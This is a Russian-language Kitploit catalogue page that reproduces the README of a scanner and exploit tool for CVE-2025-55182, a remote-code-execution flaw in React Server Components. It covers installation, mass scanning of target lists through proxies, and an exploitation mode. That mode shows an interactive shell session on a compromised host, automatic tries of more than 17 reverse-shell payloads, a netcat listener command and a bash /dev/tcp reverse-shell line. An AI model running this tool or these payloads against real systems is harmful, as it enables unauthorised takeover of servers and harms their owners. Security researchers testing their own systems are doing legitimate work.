Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Сканер критической уязвимости RCE для React Server Components (CVE-2025-55182). Автоматизированный фреймворк эксплуатации с поддержкой множества payload, возможностями прокси и интерактивным выполнением команд. | Kitploit
Инструменты/GitHubGitHub/alihzsec/cve-2025-55182
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

Сканер критической уязвимости RCE для React Server Components (CVE-2025-55182). Автоматизированный фреймворк эксплуатации с поддержкой множества payload, возможностями прокси и интерактивным выполнением команд.

Репозиторий
15179 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 Сканер и эксплойт

[!Warning] Этот репозиторий предназначен исключительно для образовательных и исследовательских целей.

  • Используйте предоставленные PoC только на системах, которыми вы владеете или на которые имеете явное разрешение для тестирования.
  • Несанкционированный доступ, эксплуатация или неправомерное использование любых материалов из этого репозитория являются незаконными.
  • Автор(ы) не несут ответственности за любой ущерб, неправомерное использование или юридические последствия, возникшие в результате ненадлежащего использования.

🔍 Обзор

CVE-2025-55182 — это критическая уязвимость удалённого выполнения кода, затрагивающая версии React Server Components 19.0.0, 19.1.0, 19.1.1 и 19.2.0. Эта уязвимость возникает из-за небезопасной десериализации полезных нагрузок HTTP-запросов к конечным точкам Server Function, что позволяет неаутентифицированным злоумышленникам удалённо выполнять произвольный код.


🐛 Детали уязвимости

CVE ID: CVE-2025-55182
Затронутые версии:

  • react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0

🚀 Установка

Предварительные требования

  • Python 3.8 или выше
  • pip (менеджер пакетов Python)

Настройка

  1. Клонируйте репозиторий
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
  1. Создайте виртуальное окружение (рекомендуется)
python3 -m venv .venv
source .venv/bin/activate
  1. Установите зависимости
pip install -r requirements.txt

📖 Использование

python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]

Аргументы

АргументОписание
-d, --detectionРежим обнаружения (сканирование на уязвимости)
-e, --exploitРежим эксплуатации (эксплуатация одной цели)
-u, --url URLURL одной цели для сканирования/эксплуатации
-l, --list FILEФайл со списком целевых URL (только режим обнаружения)
-p, --proxy URLURL одного прокси (например, http://127.0.0.1:8080)
-pl, --proxy-list FILEФайл со списком URL прокси (по одному на строку)
-t, --threads NКоличество параллельных потоков (по умолчанию: 10, только режим обнаружения)
-s, --silentТихий режим — показывать только уязвимые цели (только режим обнаружения)
-o, --output [FILE]Сохранить уязвимые цели в файл (только режим обнаружения). Если имя файла не указано, используется по умолчанию: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt
--debugВключить отладочное логирование — показывает детали ответов и повторные попытки (недоступно в тихом режиме)

🎯 Режим обнаружения

Сканирование одной цели

python3 main.py -d -u https://example.com

Сканирование нескольких целей из файла

python3 main.py -d -l targets.txt

Сканирование с прокси

python3 main.py -d -l targets.txt -p http://127.0.0.1:8080

Тихий режим (вывод только уязвимых целей)

python3 main.py -d -l targets.txt -s

Многопоточное сканирование

python3 main.py -d -l targets.txt -t 20

💣 Режим эксплуатации

Интерактивная оболочка

python3 main.py -e -u https://vulnerable-site.com

Затем выберите [i] для интерактивной оболочки:

Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): i

shell> whoami
ec2-user

shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)

shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...

shell> exit

Обратная оболочка (Reverse shell)

python3 main.py -e -u https://vulnerable-site.com

Затем выберите [r] для обратной оболочки и выберите тип полезной нагрузки:

Вариант 1: Стандартные полезные нагрузки (рекомендуется)

Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): r

Choose payload option:
  [d] Use default payloads (Try multiple reverse shells)
  [c] Provide custom payload

Enter your choice (d/c): d

Enter your IP and port in this format:
Example: 192.168.1.100:4444

IP:PORT> 192.168.1.100:4444

Setup your listener with this command:
nc -lvnp 4444

Press ENTER when your listener is ready...

Инструмент автоматически попробует более 17 различных полезных нагрузок обратной оболочки, пока одна из них не сработает.

Вариант 2: Пользовательская полезная нагрузка

Enter your choice (d/c): c

Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📚 Ссылки

  • Официальное уведомление React по безопасности
  • Уведомление Meta по безопасности
  • Уведомление Vercel по безопасности
  • Уведомление Next.js по безопасности
  • Детали CVE

Если вы нашли этот инструмент полезным, пожалуйста, поставьте ему звезду! ⭐
Сделано с ❤️ для сообщества безопасности
Скачать инструмент